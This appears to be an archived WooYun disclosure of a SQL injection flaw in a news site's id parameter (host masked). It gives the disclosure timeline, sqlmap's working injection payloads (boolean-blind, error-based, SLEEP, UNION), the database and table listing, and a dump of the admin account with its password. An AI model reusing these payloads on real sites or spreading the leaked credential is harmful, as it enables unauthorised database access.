乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-22: 细节已通知厂商并且等待厂商处理中 2015-12-24: 厂商已经确认,细节仅向厂商公开 2016-01-03: 细节向核心白帽子及相关领域专家公开 2016-01-13: 细节向普通白帽子公开 2016-01-23: 细节向实习白帽子公开 2016-02-07: 细节向公众公开
问题链接:http://**.**.**.**/news_1.php?id=1741
sqlmap identified the following injection point(s) with a total of 60 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1741 AND 7241=7241 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=1741 AND (SELECT 9635 FROM(SELECT COUNT(*),CONCAT(0x716b717671,(SELECT (ELT(9635=9635,1))),0x716a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=1741 OR SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: id=-3682 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b717671,0x4d4f686b416e666f7052,0x716a627871),NULL,NULL,NULL-- ---web application technology: Apache 2.2.23, PHP 5.3.17back-end DBMS: MySQL 5.0current database: 'admin'current user is DBA: Falseavailable databases [3]:[*] admin[*] information_schema[*] test
Database: admin+--------------+---------+| Table | Entries |+--------------+---------+| article | 2216 || automan | 1828 || news | 1681 || shopclass | 84 || carcompany | 53 || adv | 13 || banner | 9 || articleclass | 6 || content | 4 || contents | 4 || carclass | 3 || admin | 1 || siteinfo | 1 || smtp | 1 |+--------------+---------+
Table: admin[6 columns]+--------+-------------------+| Column | Type |+--------+-------------------+| adsno | int(11) || email | varchar(50) || login | varchar(15) || master | enum('2','1','0') || name | varchar(20) || paswd | varchar(15) |+--------+-------------------+Database: adminTable: admin[1 entry]+-------+----------------+-------+-------+-------+--------+| name | paswd | login | email | adsno | master |+-------+----------------+-------+-------+-------+--------+| admin | hamann3turbg96 | admin | NULL | 1 | 1 |+-------+----------------+-------+-------+-------+--------+
危害等级:高
漏洞Rank:17
确认时间:2015-12-24 18:41
感謝通報
暂无